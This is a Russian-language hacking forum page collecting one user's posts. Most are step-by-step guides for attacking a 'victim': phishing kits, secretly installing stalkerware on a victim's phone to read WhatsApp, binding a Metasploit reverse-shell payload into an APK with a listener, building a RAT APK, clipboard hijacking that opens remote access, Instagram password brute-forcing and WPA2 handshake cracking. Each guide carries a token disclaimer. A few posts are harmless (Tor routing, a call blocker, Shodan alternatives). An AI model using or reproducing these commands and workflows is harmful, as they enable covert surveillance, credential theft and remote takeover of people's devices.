Перейти к содержимому


Контент пользователя roguevad

Найдено 147 записей от roguevad (Поиск ограничен от 24-Май 23)



#28254 30 готовых сервисов для фишинга

Отправлено по roguevad   05 Сентябрь 2021 - 09:25 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать об инструменте для фишинга. BlackEYE — универсальный инструмент для фишинга наиболее популярных сервисов таких как Instagram, Facebook, Yandex, PayPal и т.д. С помощью данного инструмента вы сможете создавать фишинговые сайты практически любого популярного сервиса, что дает ему огромное преимущество перед другими программами.

 

Установка:

 

   apt upgrade && apt update

   pkg install git 

   git clone https://github.com/An0nUD4Y/blackeye

   ls

   cd blackeye

 

Запуск:

 

   bash blackeye.sh

 

Теперь мы можем выбрать уже готовый сервис (01-32) или же создать свой (33). После ввода цифры, сгенерируется ссылка, которую можно преобразовать с помощью утилиты URLPhish и скинуть жертве. Ну а если вашего сайта нет в списке, то вы его можете добавить с помощью пункта 33, там вам следует ввести URL сайта, и фишинг будет готов. Данный сервис будет очень полезен для проведения фишинга. Множество имеющихся функций смогут помочь практически в любой ситуации. Поэтому для удобства и быстроты, рекомендую использовать именно этот инструмент.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28281 ARTLAS - Инструмент Kali Linux

Отправлено по roguevad   14 Март 2022 - 09:28 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам об очень полезном инструменте для Kali Linux, а именно про такую утилиту как ARTLAS. ARTLAS - Это утилита для анализа логов Apache в реальном времени. Принцип работы построен на 10 важнейших уязвимостях по классификации OWASP.

 

Данный инструмент выявляет практически все возможные попытки эксплуатации ваших веб-приложений и способен уведомить вас напрямую через Telegram, Zabbix или Syslog/SIEM.

 

Поддерживаемые веб-сервера: Apache, Apache vHost.

 

Установка:

 

1. git clone https://github.com/mthbernardes/ARTLAS

2. cd ARTLAS/

3. sudo pip2 install -r requirements.txt

 

Необходимо отредактировать файл artlas.py. Для этого откройте его и выполните следующие действия:

 

1. gedit artlas.py

2. Найдите там строку: "http://dev.itratos.d...lt_filter.json"

3. Замените её на: "https://raw.githubus...lt_filter.json"

4. Сохраните и закройте файл.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28297 Canarytokens

Отправлено по roguevad   30 Март 2022 - 12:42 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам про один полезный сервис. Canarytokens — один из типов настраиваемых уникальных ссылок, по которым кто-то щелкает или получает доступ к этим ссылкам, мы можем получить много информации о цели, такой как IP, местоположение, браузер, цель использует tor или нет и многое другое.

 

Создаем свой CanaryToken

1. Переходим по ссылке и нажимаем на "Select your token";

Здесь мы видим, что можем генерировать канаритокены для разных типов работ;

2. Выбираем "Web-Bug/URL token", затем вводим наш адрес эл.почты для получения уведомлений;

3. Создаем заметку на тот случай, когда приходит предупреждение, мы можем определить, от какого токена приходит предупреждение;

Эта заметка полностью зависит от нас, от того, какую заметку мы здесь напечатали;

4. Нажимаем на «Create my Canarytoken», копируем и отправляем ссылку жертве;

 

Это очень полезный сервис, который поможет вам легко получить некоторую информацию о вашей жертве и в дальнейшем использовать ее для каких-то целей.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28293 Cледим за жертвой с помощью ссылки

Отправлено по roguevad   25 Март 2022 - 11:34 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, каким образом можно следить за жертвой с помощью ссылки.

Trape — OSINT инструмент, который позволяет отслеживать и выполнять атаки социальной инженерии в режиме реального времени.

 

Утилита создает фишинг ссылку, и через нее следит за пользователем. Благодаря данному инструменту можно получить такую информацию как: IP, геолокация, ОС.

 

Установка:

$ git clone https://github.com/jofpin/trape.git

$ cd trape

$ pip3 install -r requirements.txt

$ python3 trape.py --url <ссылка на любую страницу> --port 8080

 

Использование

 

$ python3 trape.py --url http://example.com --port 8080

 

Таким образом мы получим фишинг ссылку, ссылку на админ панель, пароль для входа в админ панель.

Поэтому с помощью такой небольшой утилиты, вы можете легко получить доступ к местоположению жертвы. Это очень эффективный и скрытный метод, поэтому если необходимо установить слежку, то это будет идеальный вариант. Самое главное незаметно дать ссылку жертве, а дальше за вас все сделает программа.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28662 PowerShell для сисадминов

Отправлено по roguevad   17 Май 2022 - 01:31 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам про небольшую книгу по PowerShell для сисадминов.

Вы научитесь:

• Комбинировать команды, управлять потоком выполнения, обрабатывать ошибки, писать сценарии, запускать их удаленно и тестировать их с помощью фреймворка тестирования Pester.

• Анализировать структурированные данные, такие как XML и JSON, работать с популярными сервисами (например, Active Directory, Azure и Amazon Web Services), создавать системы

мониторинга серверов.

• Создавать и проектировать модули PowerShell.

• Использовать PowerShell для удобной, полностью автоматизированной установки Windows.

• Создавать лес Active Directory, имея лишь узел Hyper-V и несколько ISO-файлов.

• Создавать бесчисленные веб- и SQL-серверы с помощью всего нескольких строк кода! Реальные примеры помогают преодолеть разрыв между теорией и работой в настоящей системе,

а легкий авторский юмор упрощает чтение.

Перестаньте полагаться на дорогое ПО и невнятные советы из сети!

 

Скачать книгу…

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28237 Remote Bot for Telegram, управляем смартфоном с помощью Телеграма на Android

Отправлено по roguevad   18 Август 2021 - 11:24 в Делимся опытом.

Приветствую, хакеры! В маркете можно найти множество приложений для удаленного управления смартфоном и его поиска. Но все они имеют две проблемы: требование довериться непонятному серверу, который будет хранить и обрабатывать информацию с твоего смартфона, и необходимость использовать не всегда удобный веб-интерфейс. Remote Bot for Telegram решает обе проблемы.

Remote Bot for Telegram только называется ботом. На самом деле это вполне обычное приложение для Android, которое получает удаленные команды с помощью push-уведомлений, сгенерированных телеграм-ботом. Причем это не какой-то единый бот, а твой персональный, который будет слушаться только тебя.

rbt_1.png

 

rbt_2.png

 

Главное окно Remote Bot и настройки. Сервер здесь тоже присутствует, но, по заявлению автора, он всего лишь выполняет роль диспетчера сообщений от бота к телефону и обратно. Верить или нет этим словам — решать тебе, но стоит иметь в виду, что также историю отданных команд и ответов бота будет хранить «Телеграм». В зашифрованном виде, естественно.

 

Список поддерживаемых команд очень обширен. Приложение позволяет:

  • /sms — читать и отправлять SMS;
  • /call — совершать телефонные звонки;
  • /callhystory и /contacts — просматривать историю звонков и список контактов;
  • /wifi/bluetooth — включать/выключать Wi-Fi и Bluetooth
  • /photo — снимать фото;
  • /player — управлять плеером

...и многое, многое другое, вплоть до выполнения задач Tasker и детектора движения.

rbt_3.png

rbt_4.png

 

Управляем смартфоном, все команды можно отдавать с любого устройства, где используется тот же аккаунт, к которому был подключен бот. По умолчанию Remote Bot пытается создать и подключить бота самостоятельно, для чего спрашивает номер телефона и пришедший в SMS или Telegram код авторизации. Но этот способ может не сработать, и тогда бота придется создавать самому с помощью @botfather. Но не стоит пугаться, все очень просто.

В остальном это отличное, стабильно работающее приложение. Единственный недостаток: ограничение в десять вызовов каждой команды в день. Снять его можно, естественно, с помощью денежки: либо один доллар за пожизненный анлок, либо 30 рублей в месяц (очень странная ценовая политика, но приятная).

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28258 Responder. Инструмент для выполнения MiTM атак.

Отправлено по roguevad   07 Сентябрь 2021 - 12:07 в Делимся опытом.

Приветствую, хакеры! В данной стать хочу рассказать об интересном инструменте для выполнения атак. Responder — инструмент для выполнения MiTM атак в отношении методов аутентификации в Windows. Незаменимый инструмент в Active Directory сетях. Кроме спуфинга умеет перехватывать NTLM-аутентификацию, в комплекте также идет набор инструментов для сбора информации и реализации атак NTLM-Relay. Очень полезный инструмент для совершения атак, советую обратить на него внимание.

 

  • По умолчанию поднимает множество серверов с поддержкой NTLM-аутентификации: SMB, MSSQL, HTTP, HTTPS, LDAP, FTP, POP3, IMAP, SMTP;
  • Позволяет подменять DNS в случае MITM-атак (ARP-спуфинг и т.д.);
  • Fingerprint хостов, совершивших широковещательный запрос;
  • Analyze mode — для пассивного наблюдения за запросами;
  • Формат перехваченных хешей при NTLM-аутентификации совместим с John the Ripper и Hashcat.

 

Информация по установке есть на GitHub. Рекомендую прочитать эту информацию, чтобы наиболее эффективно использовать данный инструмент.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28307 Viridae архив с современными вирусами под Android и PC

Отправлено по roguevad   10 Апрель 2022 - 11:20 в Делимся опытом.

Приветствую, хакеры! Термин «вредоносное ПО» используется для описания любой вредоносной программы на компьютере или мобильном устройстве. Эти программы устанавливаются без согласия пользователей и могут вызывать ряд неприятных последствий, таких как снижение производительности компьютера, извлечение из системы персональных данных пользователя, удаление данных или даже воздействие на работу аппаратных средств компьютера.

Поскольку киберпреступники придумывают все более сложные способы проникновения в системы пользователей, рынок вредоносных программ существенно расширился.

 

Сборник малварей для ПК и телефона

Установка:

   git clone https://github.com/E...ICA/Viridae.git

   cd Viridae

   pip2 install -r requirements.txt

 

Использование:

   python2 Viridae – запуск утилиты

Далее выбираем платформу (Android/MacOS/Windows и тд.) и уже сам вирус.

 

Мифы и факты

Существует ряд распространенных мифов, связанных с компьютерными вирусами:

  • Любое сообщение об ошибке компьютера указывает на заражение вирусом. Это неверно: сообщения об ошибках также могут быть вызваны ошибками аппаратного или программного обеспечения.
  • Вирусам и червям всегда требуется взаимодействие с пользователем. Это не так. Для того чтобы вирус заразил компьютер, должен быть исполнен код, но это не требует участия пользователя. Например, сетевой червь может заражать компьютеры пользователей автоматически, если на них имеются определенные уязвимости.
  • Вложения к электронным письмам от известных отправителей являются безопасными. Это не так, потому что эти вложения могут быть заражены вирусом и использоваться для распространения заражения. Даже если вы знаете отправителя, не открывайте ничего, что в чем вы не уверены.
  • Антивирусные программы могут предотвратить заражение. Со своей стороны, поставщики антивирусного ПО делают все возможное, чтобы не отставать от разработчиков вредоносных программ, но пользователям обязательно следует установить на своем компьютере комплексное защитное решение класса Internet security, который включает в себя технологии, специально предназначенные для активного блокирования угроз. Даже при том, что 100-процентной защиты не существует. Нужно просто осознанно подходить к обеспечению собственной онлайн-безопасности, чтобы уменьшить риск подвергнуться атаке.
  • Вирусы могут нанести физический ущерб вашему компьютеру. Что если вредоносный код приведет к перегреву компьютера или уничтожит критически важные микрочипы? Поставщики защитных решений неоднократно развенчивали этот миф – такие повреждения просто невозможны.

Признаки заражения

Хотя большинство вредоносных программ не оставляет никаких явных следов, и ваш компьютер работает нормально, иногда все же можно заметить признаки возможного заражения. Самый первый из них – снижение производительности, т.е. процессы происходят медленные, загрузка окон занимает больше времени, в фоновом режиме работают какие-то случайные программы. 

Еще одним настораживающим признаком может считаться измененных домашних интернет-страниц в вашем браузере или более частое, чем обычно, появление всплывающих объявлений. В некоторых случаях вредоносное ПО даже может влиять на базовые функции компьютера: не открывается Windows, нет подключения к Интернету или доступа к более высокоуровневым функциям управления системой более высокого уровня. 

Если вы подозреваете, что ваш компьютер может быть заражен, немедленно произведите проверку системы. Если заражение не обнаружено, но вы все еще сомневаетесь, получите второе мнение – запустите альтернативный антивирусный сканер.

Репозиторийhttps://github.com/Err0r-ICA/Viridae

Авторhttps://github.com/Err0r-ICA/

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28212 Аналоги поисковой системы Shodan!

Отправлено по roguevad   13 Июль 2021 - 02:29 в Делимся опытом.

Приветствую, хакеры! О поисковике подключенных к глобальной сети устройств под названием Shodan знают многие, что не скажешь о более качественных его аналогах. Что интересно, подобные поисковые системы в нынешнее время пользуются высокой популярностью в Китае. Об этом свидетельствуют доминирующие позиции тамошних поисковиков на глобальном рынке. Давайте рассмотрим несколько потенциальных конкурентов Shodan.

 

1. FOFA.so — Это один из представителей поисковиков китайского сегмента. Имеет конкурентноспособный результат поиска по запросу "port: 80" - 5 804 777 устройств. Для сравнения Shodan находит всего 246 996. Единственный минус сервиса - основные части интерфейса на китайском, однако присутствует и английский, в описании устройств, к примеру. Система поисковых запросов у FOFA.so схожа с Shodan, во всяком случае можно попробовать перевести документацию.

 

2. ZoomEye — Результат поиска по запросу "port: 80" у данного поисковика составляет 318 893 041, что является абсолютным рекордом списка. ZoomEye имеет качественный английский интерфейс, и, что самое интересное, документация также переведена на английский. Присутствует API. Система поисковых запросов схожа с Shodan, но с небольшими дополнениями.

 

3. Censys — Данный поисковик слабее предшественников, однако все равно может создать конкуренцию Shodan. Разрабатывается командой из Мичигана, США, соответственно язык интерфейса исключительно английский. Отличительной особенностью Censys является обязательная регистрация, без которой невозможно совершить запрос.

 

 

 




#28222 Анонимно выходим в сеть с помощью Tor-Router

Отправлено по roguevad   31 Июль 2021 - 01:56 в Делимся опытом.

Приветствую, хакеры! Tor Router позволяет вам использовать сеть TOR в качестве прозрачного прокси-сервера и отправлять весь ваш трафик, включая DNS-запросы, через TOR. Tor router не трогает системные файлы, как это делают остальные инструменты для маршрутизации трафика. Причина этого в том, что нет необходимости изменять файлы для маршрутизации трафика, так как сбой в скрипте может нарушить ваше системное соединение.

 

Установка

 

   apt-get && apt-get upgrade

   sudo apt install tor

   git clone https://github.com/e...dshl/tor-router

   cd tor-router/files

 

Открываем файл torrc через текстовый редактор:

   sudo nano /etc/tor/torrc

 

И добавляем в файл следующий текст:

   Seting up TOR transparent proxy for tor-router

   VirtualAddrNetwork 10.192.0.0/10

   AutomapHostsOnResolve 1

   TransPort 9040

   DNSPort 5353

 

После этого перезапускаем службу TOR:

   sudo systemctl restart tor

 

Использование

 

   ./tor-router

 

Теперь весь ваш трафик проходит через сеть TOR. Проверить это можно на на check.torproject.org. Для тестов DNS: dnsleaktest.com

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28305 Блокируем атаку SMS-бомбера

Отправлено по roguevad   09 Апрель 2022 - 12:19 в Делимся опытом.

JuH5tob.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как можно заблокировать работу SMS-бомбера. Как работает SMS-бомбер? Злоумышленник запускает специальный софт, который автоматически отправляет на целевой телефон до 1.000 сообщений в минуту. Лавина SMS’ок связывает жертву по рукам и ногам: воспользоваться смартфоном просто нереально. И он жутко нагревается! Обычно бомберы используют для розыгрыша, но если ты кому-то «насолил», а твоя работа связана с общением по телефону, шутка может обернуться серьёзными финансовыми потерями.

 

Anti Nuisance — это приложение для блокировки звонков и SMS. Всё, что нужно, — просто добавить нежелательный номер в чёрный список. Все вызовы и сообщения, поступающие с указанного номера, заблокируются! Также есть дополнительная возможность: можно прекратить любые звонки и SMS в течение определённого времени суток.

 

Надо сказать, я подобрали неудачный заголовок. SMS-бомбер — как-то узковато. Anti Nuisance может заблокировать всех: спамеров, рекламщиков, коллекторов и т.д. Пользуйся!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28324 Брутфорс Instagram через Termux

Отправлено по roguevad   16 Апрель 2022 - 12:53 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о брутфорсе Instagram с помощью Termux. Перед вами свежая утилита для подбора пароля к аккаунтам Instagram. Инструкция актуальна на Kali Linux, однако процесс запуска и взлома ничем не отличается от Termux'a.

 

Установка:

  pip install pipenv

  git clone https://github.com/B...e-01/Instagram-

  cd Instagram-

 

Запуск:

  python3 instagram.py -u никнейм -p passwords.txt -px proxylist.txt --stats -m 0

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28241 Быстро подбираем доменное имя для своего сайта

Отправлено по roguevad   26 Август 2021 - 12:50 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать, как быстро выбрать домен, потому что выбор доменного имени для собственного сайта дело довольно непростое. Большинство звучных имен уже давно занято другими компаниями или находятся во владении киберсквоттеров. В такой ситуации очень сложно найти действительно уникальный домен, который еще и подошел бы для вашего проекта.

 

Одним из самых надежных и быстрых вариантов может стать сервис Domainr. Это аккредитованный ICANN инструмент, который в режиме реального времени отслеживает реестры доменов и поможет подобрать свободный для вас. При этом Domainr убережет вас от ложных поисков, поскольку в нём используется сложная система на основе ИИ, которая практически никогда не подводит.

 

Помимо поиска свободных доменов Domainr также предложит созвучное название домена, если все ваши варианты будут заняты. Сервис работает с доменами всех крупных доменных зон и подскажет, как назвать сайт, даже если .com уже занят, уверен, вы сможете найти подходящий для себя вариант.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28218 Взламываем whatsapp и следим за чатами

Отправлено по roguevad   20 Июль 2021 - 01:30 в Делимся опытом.

Приветствую, хакеры! Данное приложение способно записывать сообщения и в реальном времени отправлять их вам. Вы можете видеть все сообщения жертвы каждый раз, как только она заходит в онлайн.

1. Ссылка на сайт - ikeymonitor.com, выбирайте полную версию и регистрируйтесь. 

d3a35b0efad2b5e6040a2.png

 

2. Выберите девайс жертвы и тип устройства, продолжайте регистрацию дальше. 

c1d36dcaafdb57b27f921.png

 

3. Проверьте почту, туда упадут данные для входа.

b2db4fc4d87790667168d.png

 

4. После входа вы попадете в панель, она выглядит следующим образом. 

2303d05270abbd4ed4859.png

 

5. Скачайте и установите приложение на устройство вашей жертве. 

97f08b99ad9255efdf39f.png

 

 Как установить приложение на телефон вашей жертвы - это уже ваши проблемы, используйте навыки СИ. После установки приложения вы получите возможность получать все сообщения в реальном времени, помимо этого вы так же сможете получать информацию с других приложений. Полученные навыки можно применить для заработка и не только, если есть хорошие навыки СИ.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28298 Взламываем веб-камеру с помощью фишинговой атаки

Отправлено по roguevad   31 Март 2022 - 11:47 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как взломать веб-камеру с помощью фишинга. Стоит заранее предупредить о том, что уже не раз публиковались похожие инструменты. Тем не менее, данная утилита отличается широкой вариативностью настройки фишинговой ссылки, пробросом портов и обходом гугла.

 

Seeu — скрипт на основе bash для взлома камер устройств с помощью функций portforwarding и google bypass.

 

Установка:

   $ apt-get update -y

   $ apt-get upgrade -y

   $ termux-setup-storage

   $ pkg install curl -y

   $ pkg install wget -y

   $ pkg install git -y

   $ pkg install php -y

   $ git clone https://github.com/noob-hackers/seeu

   $ cd seeu

 

Запуск:

   $ bash seeu.sh

 

У нас откроется, меню, нажимаем цифру 1 и переходим к настройке фишинговой страницы. Далее выбираем вид фишинговой ссылки, генерируем ее и запускаем. Скидываем ссылку жертве и после того, как она по ней перейдет, мы получим ее фотографию в папке с скриптом.

 

Вот таким простым способом вы можете использовать фишинговую атаку для получения доступа к веб-камере. Очень быстро и весьма эффективно.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28220 Взлом Android смартфона

Отправлено по roguevad   28 Июль 2021 - 01:46 в Делимся опытом.

Приветствую, хакеры! В данной статье мы расскажем вам о том, как склеить .apk файл с метерпретером при помощи Apkmod, что позволит нам взламывать смартфон.

Нам понадобится:

  • .apk, с которым у нас будет склейка
  • Metasploit
  • Apkmod

Приступаем!

Установка Apkmod:

Сначала нужно скачать установщик:

   wget https://raw.githubus...master/setup.sh

051abec016957e89411e9.png

Затем вводим

   sh setup.sh

Ждем окончания установки

Склейка

Для примера я буду использовать прогу WiFi Map Pro (для наглядности переименовал в hackerplace.apk)

   apkmod -b hackerplace.apk -o WiFiMapPro.apk LHOST=ЗДЕСЬ СВОЙ АЙПИ LPORT=ТУТ ПОРТ

-b : файл к которому клеем пейлод

-o : выходной файл с пейлодом

Теперь переходим к Metasploit:

   msfconsole

Используем multi/handler:

   use exploit/multi/handler

Ставим пейлоад под Android:

   set payload android/meterpreter/reverse_tcp

Прописываем наш IP и Порт:

   set LHOST АЙПИ

   set LPORT ПОРТ

Запускаем:

   exploit

 

b7e6a52905a18d74c0090.png

 

Теперь скидываем жертве и смотрим на результат:

82ddbf676b6b0b9a86f64.png

 

На этом у нас все!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28217 Взлом Wifi паролей WPA2-PSK с помощью Cowpatty

Отправлено по roguevad   19 Июль 2021 - 01:56 в Делимся опытом.

Приветствую, хакеры! В данном руководстве мы воспользуемся утилитой, разработанной специалистом по безопасности беспроводных сетей Джошуа Райтом, под названием cowpatty (чаще всего, пишут coWPAtty). Это приложение упрощает и ускоряет гибридную/словарную атаку на пароли WPA2. Итак, давайте приступим к работе!

 

 

 

Шаг 1: Найдите Cowpatty

Cowpatty - одна из сотен полезных утилит, входящих в состав набора программного обеспечения Kali Linux. По какой-то причине, её нет в директории /pentest/wireless. Вместо этого данное приложение находится в папке /usr/local/bin, так что давайте её откроем.

Код:

cd /usr/local/bin

Поскольку cowpatty находится в директории /usr/local/bin, и эта директория должна быть в нашей переменной PATH, её запуск возможен из любой папки в Kali Linux.

 

Шаг 2: Найдите экран помощи Cowpatty

Чтобы получить краткий обзор опций cowpatty, просто введите:

Код:

cowpatty

Najdite-jekran-pomoshhi-Cowpatty-2.png

 

 

 

Kali Linux предоставит вам небольшой экран помощи. Обратите внимание, что cowpatty требуются следующие данные для работы:

  • список слов
  • файл с сохранённым хэшем пароля
  • SSID точки доступа, которую мы будем взламывать

Шаг 3: Переключите беспроводной адаптер в режим мониторинга

Как и во время взлома пароля с помощью aircrack-ng, нам нужно переключить беспроводной адаптер в режим мониторинга.

Код:

airmon-ng start wlan0

Perekljuchite-besprovodnoj-adapter-v-rez

 

 

 

Шаг 4: Создайте файл для перехвата

Далее, нам необходимо создать файл, в котором будет храниться хешированный пароль, перехваченный в процессе 4-стороннего рукопожатия.

Код:

airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0

 

Эта команда запустит дамп на выбранной точке доступа (00:25:9C:97:4F:48), указанном канале (-c 9) и сохранит хэш в файл под названием cowcrack.

 

Шаг 5: Перехватите рукопожатие

Теперь, когда кто-то подключится к точке доступа, мы перехватим хэш. Airdump-ng уведомит нас об этом посредством сообщения в правом верхнем углу.

 

Perehvatite-rukopozhatie-55555.png

 

 

Шаг 6: Запустите Cowpatty

После получения хэша пароля, мы можем использовать cowpatty вместе с нашим списком слов для его взлома.

Код:

cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2

Zapustite-Cowpatty-62452.png

 

Как вы можете видеть на скриншоте выше, cowpatty генерирует хэш для каждого слова в нашем списке с SSID в качестве сида и сравнивает его с перехваченным хэшем. Как только хэш совпадёт, утилита отобразит пароль для точки доступа на экране.

 

Шаг 7: Создайте свой собственный хэш

Хотя cowpatty - довольно простая в использовании утилита, она иногда бывает очень медленной. Хэш пароля создаётся с помощью алгоритма SHA1, а в качестве сида выступает значение SSID. Это значит, что у одного и того же пароля будут разные хэши для точек доступа с разными SSID. Это не позволяет нам использовать одну и ту же таблицу для всех точек доступа. Утилита cowpatty должна взять предоставленный вами список паролей и вычислить хэш каждого из них с учётом заданного SSID. Это очень медленная задача, сильно нагружающая процессор.

 

Сейчас cowpatty поддерживает работу с уже готовым файлом хэшей, что ускоряет взлом пароля WPA2-PSK почти в 1000 раз! Файлы с предварительно вычисленными хэшами можно найти в интернете. Эти файлы были сгенерированы с использованием 172000 словарных файлов и 1000 самых популярных SSID. Однако если ваш SSID не входит в эту 1000, данный список хэшей нам ничем не поможет.

 

В этом случае нам придётся сгенерировать свой собственный список хэшей на базе SSID нашей точки доступа. Это можно сделать с помощью приложения под названием genpmk. Чтобы создать файл хэшей для списка слов «darkcode» и SSID «Mandela2», введите:

Код:

genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Sozdajte-svoj-sobstvennyj-hjesh-77.png

 

 

Шаг 8: Использование нашего хэша

После генерации списка хэшей для определённого SSID, мы можем приступить к взлому пароля с помощью cowpatty, выполнив следующую команду:

Код:

cowpatty -d hashfile -r dumpfile -s ssid

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28421 Взлом и управление смартфоном

Отправлено по roguevad   27 Апрель 2022 - 09:14 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье хочу рассказть о том, как взломать и управлять смартфоном. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому.

 

Установка:

▪️ Устанавливаем   Java

▪️ Скачиваем AhMyth RAT

 

Создаём вредоносный APK:

▪️ Чтобы создать файл APK для Android, откройте вкладку APK Builder.

▪️ В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины.

▪️ В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474).

▪️ Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке:

C:\Users\<ваш_юзер>\AhMyth\Output

 

Готово! Теперь осталось отправить жертве данный APK файл.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.




#28235 Взлом компьютера одной фразой

Отправлено по roguevad   16 Август 2021 - 12:01 в Делимся опытом.

Приветствую, хакеры! Суть уязвимости заключается в частичном использовании социальной инженерии и невнимательности пользователя. Очень многие, когда смотрят какой-то гайд или мануал на сайте – копируют текст, и тупо вставляют его в командную строку даже не задумываясь – хотя так делать в принципе нельзя. 

Но утилита PasteZort пошла дальше. Она позволяет производить спуффинг буфера обмена: пользователь с сайта хочет скопировать одну команду

“ping 8.8.8.8” 

а вместо этого, в буфер обмена копируется несколько другая команда, с зашифрованным содержимым 

“ping 8.8.8.8; ASAUSDYTG(*&^@#T$)*ASDHU#*TRFGIHUSAD; cls” 

– если пользователь вставит ту команду, он даже не успеет понять что что-то произошло, т.к. терминал моментально отчистится, и на его компьютере уже будет запущен payload от Metasploit, который откроет удаленный доступ для злоумышленника.

Первым делом мы устанавливаем PasteZort : 

Bash: 

git clone https://github.com/ZettaHack/PasteZort

cd PasteZort

chmod +x * 

Запуск:

./PasteZort 

Теперь приступим к созданию данной фразы так сказать) 

1.Нам необходимо выбрать ОС жертвы:

bt-1MfXkMVU.jpg?size=807x339&quality=96&

 

2.Выбираем полезную нагрузку (я выбрал 1 – tcp ):

oiVT2UiKUD8.jpg?size=807x130&quality=96&

 

3.Вводим свой ip адрес и порт 4444:

Y-9z_YEG2Xo.jpg?size=807x96&quality=96&s

 

Теперь у нас должна генерироваться полезная нагрузка , после ее генерации , нам необходимо ввести два слова или одно, в котором будет зашифрована эта полезная нагрузка:

v2FMMZk3RJo.jpg?size=807x226&quality=96&

 

После этого у нас откроется Metasploit , а при активировании payload откроется сессия) А там творите что хотите ) 

Вот и всё ,теперь у нас запустился сервер апач где и находится наша фраза. Как ее использовать? Приведу пример : Берется и скачивается исходник кода какого либо сайта например с помощью wget , далее мы берем копируем фразу и вставляем ее в любое место сайта, далее запускаем сайт через ngrok например и кидаем жертве.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28226 Взлом компьютера с помощью буфера обмена

Отправлено по roguevad   09 Август 2021 - 02:05 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать, как взломать компьютер с помощью буфера обмена, для этого нам понадобится утилита PasteZort. Утилита PasteZort позволяет производить спуффинг буфера обмена:

пользователь с сайта хочет скопировать одну команду (например, cd /C), а вместо этой команды в буфер обмена копируется другая команда с зашифрованным содержимым (например, XGWoongq1={pdqe--downdel{c}}).

 

Если пользователь вставит данную команду, то он даже не успеет понять, что что-то произошло, так как терминал моментально очистится, и на его компьютере уже будет запущен payload от Metasploit, который откроет удаленный доступ для злоумышленника.

 

Данную атаку можно провести с помощью Kali Linux или Termux или же на других подобных платформах.

 

Установка:

 

   git clone https://github.com/ZettaHack/PasteZort

 

Запуск:

 

   cd PasteZort

   chmod +x ./PasteZ0rt

   ./PasteZ0rt

 

Все, инструмент запустился. Нам нужно выбрать ОС жертвы и мы готовы ко взлому любого компьютера. Очень простая и интересная схема взлома.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28271 Взлом любого PDF-файла защищённого паролем

Отправлено по roguevad   02 Октябрь 2021 - 02:19 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье хочу рассказать вам о том, как взломать любой запароленный PDF-файл. Многие люди хранят на своих компьютерах конфиденциальную информацию, и они не хотят, чтобы она попала в чужие руки. Чтобы защитить эти данные, мы шифруем файлы, используя защищенный паролем формат PDF. На данный момент шифрование не так безопасно, как могло бы быть, потому что файлы PDF можно расшифровать.

 

Pdfcrack — продвинутый инструмент для взлома любых PDF-файлов, защищенных паролем. Очень простой в использовании скрипт, особенно для начинающих хакеров.

 

Установка

   sudo apt-get update -y

   git clone https://github.com/m...37/pdfcrack.git

   cd pdfcrack && chmod +x crack.sh

   sudo bash crack.sh

 

После завершения проверки программа отобразит удобный интерфейс. Укажите путь к зашифрованному файл PDF, и выберите тип атаки и с хорошим словарем вы можете получить пароль от PDF файла.

Очень легкий и полезный способ для взлома PDF-файла. Особенно это может быть полезно, когда вам предлагают купить какую-то информацию в виде пароля к файлу, можно это обойти.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




